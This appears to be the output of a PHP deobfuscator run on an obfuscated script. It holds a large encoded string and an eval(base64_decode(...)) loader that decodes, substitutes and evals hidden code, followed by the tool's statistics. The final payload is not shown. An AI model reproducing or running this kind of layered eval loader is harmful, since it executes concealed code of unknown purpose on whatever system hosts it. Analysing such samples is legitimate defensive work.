p3LHdZa01sdzEyaiZ4b1spW1ZrNWZvW1osTEZ1Uk1WWldaRnVSV0RKViwyWnQsd0VfLHZsell6d3pMRj5DO1dBaiYob0s2VSlubVV4ZVZqSmpOWDJjb3pWZSQoeFdWW3goZnZFZU16bGwycEJXJnc1RVFqdWlWY1JTTGxnW1YkWWdOVzJlTSBKIG1VdSlWW1JVLldWTG8xWkZKP1krTVtSPCRsIHRNbFouMmtSZVJ2UVsyJFZmTWpGM0xqSlckbEplSnA+Lm13JjdMd05mVnZaRG9XbFpNejV0JGNuQkxsSldmdkVlTVZaTG1VRWNWMnhlVmsmN1ZrWlcydlJpLjFZeFdWQWMsRlpuV2xaaVZrdWNvV2xac2tZOExESk5aWylkTVZaVyxGWlAsWG14TVZvZSwgNS5XIFZrMmw+Q0xrZV8sWzVSVldRMTJqJnhvWylbVms1ZlIoeChNakYzWlVZZ01YbXRNbFouMmtSZVJ2UVsya056b2tWa1ZwQnQkall4Wihla1coQW4kV00pOyA1V1ZqdU47IFl4JHBCQy4xbmNzRkJ6NlU1MSwxMnhSZkV6V3AyY1ExSlFmW1JpLiAxPE5XeE0sRlpYTHdaS0xDRXouV1ZmbUZZZyRwQkMuVUFXWkY4dFdESlZOdjkxWmZFelFwUno7Mz5ZVmNOa29GWlk2Y3hjbSg1Zkpwb2YybG4zVms1ZlIoeChKREpSTlYmWyZGQTtNalZ3LlVuZVJ2UVsyJFZmTWpGM0xqSlckbEp3LHdZa01sbmMkZlI7UlZvalJXdVdaams4TEZWLkskZWtXVjhrOzFaY1YxVkJWY1pFLGNaLjtsbFNKKE50LiBlZHNGOVtWbFooJGpGdFdGWl1RMnVXViBGZVZqd1ssa3VWUVduTlYzVjEyVmU1S2Z4V1Zsb1dXdzVGSkY+Vy4xWWcmRE5NUXo1KCxYbW5aKDhnTjJRNztjeChKREpSTlYmW01YbXRNbFouMmtSZVJ2UVtXY1pOSkZuRlZVTkY7MVpjLiRFZVYyKW4uW1JaWFtSPFZjWlhWMkZXWnBCdFprNVVOVlpSVlV4ZlZqJltNMW9lLDFtVSYoNVdMRlZXV0ZaYzt6RWVWMjEpLjEyeFJDWnc2cFZXVmxuVywkTkMkYzhrSnBkW1l6SmwyVjJnWjFvV29Vb2MmREYzTGpKVyRsSncsd1lrTWxKRDIkSmYybG4zVms1ZlIoeChKREpSTlYmW01mZ1s7a0ZuZmtSV1Zsb1UyY1oub3A+WW1bPjEuMW8zTlcyZXNrbjEsMk5mVnZSVXMoWVVNVzUgWnBCdFprNWpRVmdbbXcmN1ZsZysyREpXVmtaLk1XNVlWY25CZjFZW0tXMls7a3c3TCh1KVZbUlUuV1ZMNno1bCR3TmZLWE5qJj9kdFd3JnRmekFpTGxGVlpEVmZNakYzMld1KExrZV8sWzVSTXpscEprWmUydlozbzI1ZlIoeChKQ1JCZnomeCxsZ2NSRDVuV1hkW3NDNVA7VW9jJkRGM0xqSlckallnLGMyZU1WZHhXbG14VmxkZ04yUTc7Y3goSkRKZlEgNWU7Mz5pVyhBbldWVjFNMjFdJGNaO1prVmtWcDlbViRZZ05WOWVNbEpEJHZCZjJsbjNWazVmUih4KEpESlJOViZbJihSUlZsWTdWcG5XLHd4XVJjRVtvekZ3bVs+Vy4gdXdvej5YVnBvcFp2OXhvWylbVms1ZlIoeChKREpmUXpKM3NGbFg7ekpsJGY5bixreGpaRFZ6UmtaWSxbOTFSRHVdLHdZa01sdzEyaiZ4b1spW01jVlpNMm5sTEROQ1YxWldaRjh0VmtKLjJjZTFWYzFQUWYpN1ZjeGZKcG8xJGxKdyx3WWtNbHcxMmomeG8xRjxXY2xaJj9vKSRjTnQ7MSZbTVdNdFZVQUxWak5pTGxGVlpEVmZNakYzTGpKVyRsSncsd1oubXcmdFZsWnQydylrbzNRNztjRW5mY3VOTmZ4KCxGJmNvM1YuMmtSZVJ2UVsyJFZmTWpGMzJYQlJvRllbUmMpZU0gSkQsWG8pV1ZaalpXMjdZMUooVmNOO1FVOF8kV1JpJkRWdy5VbmVSdlFbMiRWZk1qRjNMakpXO1ZZeGZ2Qk1ZVVExV2pGZTJ2WjNvMjVmUih4KEpESlJOViZbTVhtdEpENW5XVjJnNkN4LDJjdWZabGxrLFs5MVJEdV0sd1lrTWx3MTJqJnhvWylbTWMyVSZDbDxMRnVmOzFKY1dXUmkmRFZ3LlVuZVJ2UVsyJFZmTWpGM0xqSlckMnUoSnBnZU1XQWMuM1kxWGY1WCwxZFtaa0pNSkRKUk5WJltNWG10TWxaLjJwb0s2Qyl4NmspdFJ3bldtWz4xWmtkZDJrWk07azVjJFZaa1ooOGdOMlE3O2N4KEpESlJOViZbTVhtdE1sWk4yakFXTWYpeFZwMnRSY1JTTWNlW1pWb1BSakZYb2opbi4zbjtvMW4zTWNOTiZEVkRMKFpDSz9OZVJsPmkmRFZ3LlVuZVJ2UVsya05STWxKZldwb1ckbEp3LHdZZVYzPkNMQz5CVlVBWFZwVldWVTh0MlZWdVpVWWcybEo7b3pWdyxYb3RKQ1JENmNZN1ZjQVdXdjkxUkZuLFFrRWVWIDJuZjFWQldDUmpNam10WmtKTWZsVjMka05FJGMpdFZYZ18kd1IxLCggeC5XNU1WMkZQTEZvZjtXIGcsWEJjbShBbCRXRWNaMVo8V2NOTk1rWkxNY3VScyhBZSxGa2tZM2d0LlV4S0pGb1U2bG03b3A+V01jTikkRnd4Zmt1V20oQW4yY0VjV1VBVyRjTk4sd1ogJCh4MVpjWmVXak1lJkZuYyRYQldKRm5dZmxKUlZbQlBNY3gxOyRaLFdjdWNtKEFsJFdFY1oxWjxXY05OTWtaTE1jdS5SYzEoWihRa20oNW5OakZ0Jnc1PDJXNTtKRm5YMlduOyRGWjxLVnVXc3BvcFd2QkZaMUo8LGxvTixGbFMkcEJ0TSR1Y3NGPlc7cG0zVjNvS0xDNSw2a2V0TWpWVmZVWkMuVUFlSmp3ZVpsSkRNbGUxWTFvV29XbFhzdmxqVjFvO29WZFssbFpSV0ZZN1YgWjtvQ0VrUTJ1O1JjRThMbFpXJCR1ZWZjbmM7a0ZsbTNteEtDNXdWa2U3O1VSUFpqTnVLelplWihRa20oNW5OakZ0Jnc1PDJXNTtKRm5YMlduOyRGWjxLVnVXc3BvcFd2QkZaMUo8LGxvTixGbFMkcEJ0LCgxM1pXdTtWVVYsLnpGOzJrNWUsMW9YTVc1WUxERi5vVmt4V2taTVF6KWQuVXh0WTFkelFsbE5NcG9rV2NuS0tWSmVaM2d0NiBKTjJWdTtSMm5FV1cpN3NrZHpOY3goJFdBVVdrVkttRm4oLjFWO1Z6Sl1RV1pOLEZuTlYgTkNaVzhnWld1aVYzPm5XZkI7LChZZyRjWjssd25YTGxtbm9GbXhmY01bLEZrMTIkJnhvMW5Yb1dOVyxDWlNNY25LVltSKFpVbWU2VTFWZmtSPE0gblAyZkJaTWo1a0pVd05DcE5uLlV4P0xEdWxtMTluTFVBeixXUmltIG1wZnBvZU1sJmdWa1pjTTJGSzJrUXhvbGxZJGN4LjtsSiRXdj5XO3Z4VjJjeExRMUpLVnBvaVJsJltvVk5jTWxGdExsdWZmbFozLCBaZk1wViRaakpSUVcgejJsdWk2W1prZnBvZU1sJmdWa1pjTTJGSzJrTkZtRmRkJHBuaTYxbiBOa1FuWiRaV1FqWkxWaylbVnp3Z1ogRWdSa25XTWxZX05wbjE7ZnhYVmp3N1d3SiwuWz5LLjI1VUtmQjtvbCYxLGZSQzJbNWNXVnVpV3opY1dXWnVaMm5WUVhWO1dGWnQsJEFLWkZsPC5WVk07bEpqZmpBZXN3MSguRFZLO2tkemYzbSs2bGRkJHBuaTYxbiBOa1FuWiRaV1FqWkxWaylbVnp3Z1ogRWdSa25XTWxZX05wbmxtd2VrWldlWzsxWlJObG9XVzFuWCwxTnVZMVpGTEM+KDtsbmNaM0JZTTJ3ZFpqSilSbGd4Lj9CTVFbWkVKcFluO3pKMzZsRk1vdlpFSnBaRjtVWlcyakFmTWxaTVdDQmVvIGVrb1d4aVkgWmxmIE5mWmxKVy5XKXRXMUpjMmxZNVEyMXdaV3VjVmwmXzJqSlckRmdnLD9tVUpEazNKelEgWTI+ZCdhDQpzaTtsRyw7ZXNQKS9vc21kb3NHJ0p3bDJSIFZGZjFBSlJEMXZZWE5sTmpSU1ooVmosVVJsS0NSSlZ3b0ZSMnVTZjJRbi5bUkpWd29GUjJ1U2YyUUFtM1Jbbz8mZEp3bDJSIFZGZjFBSlJDRXBaKE56bz9adDZEKWU2VkI2S1ZOMlcxIGdMIEZKVjJWPzZ6dWksV1YxO1hCWzsoSjlOdikgWnZSNW0kQlMuZllbb1s+JllmbWVKVUF1WlhWbm0/SmRZazlVTGpSY0o/bHhNRjg1SmpKM0t3Pj5aKE56bz9adDZEKWU2VkI2S1ZOMlcxIGdMIEZKVjJWPzZ6ZXBLJGVrMmtWUTZXVltaV29TbWNWRSwoRmpaZmdwWDFBKGYyeEZYMThwTEMmcCZ2KWsydz5RTHYmcCZ2RWtmVlI/UjJWTFggbHdLJHVsb2NGZUtDUmZSVjluLltSZlJWOUFNRGVrZlZSP1IyVkxYIGx3NiQ5Nyc0NGFIaA==';
eval(base64_decode('JElUR0VFS19JRD1iYXNlNjRfZGVjb2RlKCRJVEdFRUtfSUQpOyRJVEdFRUtfSUQ9c3RydHIoJElUR0VFS19JRCwnZGNzdHZuPD4sPVBPKVNUW10gL0FJVUVHPztvbWV1aXByaGJANi40ZiR5cTBfOSYydyhIYScsJ29tZXVpcHJoYkA2LjRmJHlxMF85JjJ3KEhhZGNzdHZuPD4sPVBPKVNUW10gL0FJVUVHPzsnKTskUkVQPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kUEhQLiInIiwkSVRHRUVLX0lEKTtldmFsKCRSRVApOyRSRVA9MDskSVRHRUVLX0lEPTA7'));?>

Function Calls

base64_decode 1

Variables

$PHP SGhySG4+bjBUNj82QFQmJCh3d0svJkRAJ2YoPltmKCkrLGpCMk5qOFVRRlFj..
$ITGEEK_ID SGhySG4+bjBUNj82QFQmJCh3d0svJkRAJ2YoPltmKCkrLGpCMk5qOFVRRlFj..

Stats

MD5 f1c104a3c84c9316da52bced7ed83c48
Eval Count 1
Decode Time 154 ms